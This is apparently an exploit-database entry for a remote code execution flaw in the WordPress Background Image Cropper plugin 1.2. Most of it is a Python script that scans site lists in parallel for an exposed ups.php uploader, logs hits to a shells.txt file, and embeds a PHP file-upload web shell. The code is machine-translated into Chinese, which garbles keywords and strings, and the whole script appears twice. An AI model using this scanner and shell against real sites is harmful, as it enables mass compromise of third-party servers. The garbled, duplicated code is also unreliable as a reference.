#利用title: WordPress插件背景图片Cropper V1.2-远程代码执行
#日期: 2024-04-16
#作者: Milad Karimi(Ex3ptional)
#联系: [email protected]
#区h: www.zone-h.org/archive/notifier=ex3ptional
#供应商homepage: https://wordpress.org
#软件link: https://wordpress.org/plugins/background-image-cropper/
#版本: 1.2
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,重新
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
shell='''?php echo'ex3ptional'; echo'br'.php_uname()。'br';回声
'form method='post'enctype='multipart/form-data'输入type='file'
name='zb'input type='submit'name='upload'value='upload'/form';
如果($ _ post ['upload']){if(@copy($ _ files ['zb'] ['tmp_name'],
$ _files ['zb'] ['name'])){echo'exploing doade'; } else {echo'未能
上传。'; }}}?'''
requests.urllib3.disable_warnings()
标题={'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozlila/5.0(Linux; Android 7.0; SM-G892A
小/nrd90m; WV)AppleWebkit/537.36(Khtml,像壁虎一样)/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'}
TRY:
target=[i.strip()for i在open(sys.argv [1],mode='r')中。readlines()]
除了IndexError:
路径=str(sys.argv [0])。split('\\')
退出('\ n [!]输入' +路径[len(path)-1] +'sites.txt')
DEF URLDOMAIN(站点):
如果site.startswith('http://'):
site=site.replace('http://','')
Elif Site.startswith('https://'):
site=site.replace('https://','')
否则:
经过
模式=re.compile('(。*)/')
而Re.Findall(模式,站点):
sitez=re.findall(模式,网站)
site=sitez [0]
返回站点
DEF四百万(URL):
TRY:
url='http://' + urldomain(url)
检查=
requests.get(url+'/wp-content/plugins/backick-image-cropper/ups.php',headers=标头,
laster_redirects=true,超时=15)
如果'enctype='multipart/form-data'name='uploader'
id='uploader'Input type='file'name='文件'size='50'Input name='_ upl'
type='submit'id='_ upl'value='upload'
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('shells.txt','a')。写(url +
'/wp-content/plugins/background-image-cropper/ups.php \ n')
其他:
url='https://' + urldomain(url)
检查=
requests.get(url+'/wp-content/plugins/backick-image-cropper/ups.php',headers=标头,
allow_redirects=true,验证=false,timeout=15)
如果'enctype='multipart/form-data'name='uploader'
id='uploader'Input type='file'name='文件'size='50'Input name='_ upl'
type='submit'id='_ upl'value='upload'
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('shells.txt','a')。写(url +
'/wp-content/plugins/background-image-cropper/ups.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
除:
打印' - | ' + url +' - {} [失败]'。格式(fr)
MP=池(150)
MP.MAP(四百三个,目标)
mp.close()
MP.Join()
打印'\ n [!] {}保存在LOL.TXT'.FORMAT(FC)中
#日期: 2024-04-16
#作者: Milad Karimi(Ex3ptional)
#联系: [email protected]
#区h: www.zone-h.org/archive/notifier=ex3ptional
#供应商homepage: https://wordpress.org
#软件link: https://wordpress.org/plugins/background-image-cropper/
#版本: 1.2
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统,请求,重新
从多处理。
从Colorama进口
来自Colorama Import Init
init(autoret=true)
shell='''?php echo'ex3ptional'; echo'br'.php_uname()。'br';回声
'form method='post'enctype='multipart/form-data'输入type='file'
name='zb'input type='submit'name='upload'value='upload'/form';
如果($ _ post ['upload']){if(@copy($ _ files ['zb'] ['tmp_name'],
$ _files ['zb'] ['name'])){echo'exploing doade'; } else {echo'未能
上传。'; }}}?'''
requests.urllib3.disable_warnings()
标题={'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozlila/5.0(Linux; Android 7.0; SM-G892A
小/nrd90m; WV)AppleWebkit/537.36(Khtml,像壁虎一样)/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'}
TRY:
target=[i.strip()for i在open(sys.argv [1],mode='r')中。readlines()]
除了IndexError:
路径=str(sys.argv [0])。split('\\')
退出('\ n [!]输入' +路径[len(path)-1] +'sites.txt')
DEF URLDOMAIN(站点):
如果site.startswith('http://'):
site=site.replace('http://','')
Elif Site.startswith('https://'):
site=site.replace('https://','')
否则:
经过
模式=re.compile('(。*)/')
而Re.Findall(模式,站点):
sitez=re.findall(模式,网站)
site=sitez [0]
返回站点
DEF四百万(URL):
TRY:
url='http://' + urldomain(url)
检查=
requests.get(url+'/wp-content/plugins/backick-image-cropper/ups.php',headers=标头,
laster_redirects=true,超时=15)
如果'enctype='multipart/form-data'name='uploader'
id='uploader'Input type='file'name='文件'size='50'Input name='_ upl'
type='submit'id='_ upl'value='upload'
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('shells.txt','a')。写(url +
'/wp-content/plugins/background-image-cropper/ups.php \ n')
其他:
url='https://' + urldomain(url)
检查=
requests.get(url+'/wp-content/plugins/backick-image-cropper/ups.php',headers=标头,
allow_redirects=true,验证=false,timeout=15)
如果'enctype='multipart/form-data'name='uploader'
id='uploader'Input type='file'name='文件'size='50'Input name='_ upl'
type='submit'id='_ upl'value='upload'
打印' - | ' + url +' - {} [} [} [}]'。格式(fg)
打开('shells.txt','a')。写(url +
'/wp-content/plugins/background-image-cropper/ups.php \ n')
其他:
打印' - | ' + url +' - {} [失败]'。格式(fr)
除:
打印' - | ' + url +' - {} [失败]'。格式(fr)
MP=池(150)
MP.MAP(四百三个,目标)
mp.close()
MP.Join()
打印'\ n [!] {}保存在LOL.TXT'.FORMAT(FC)中
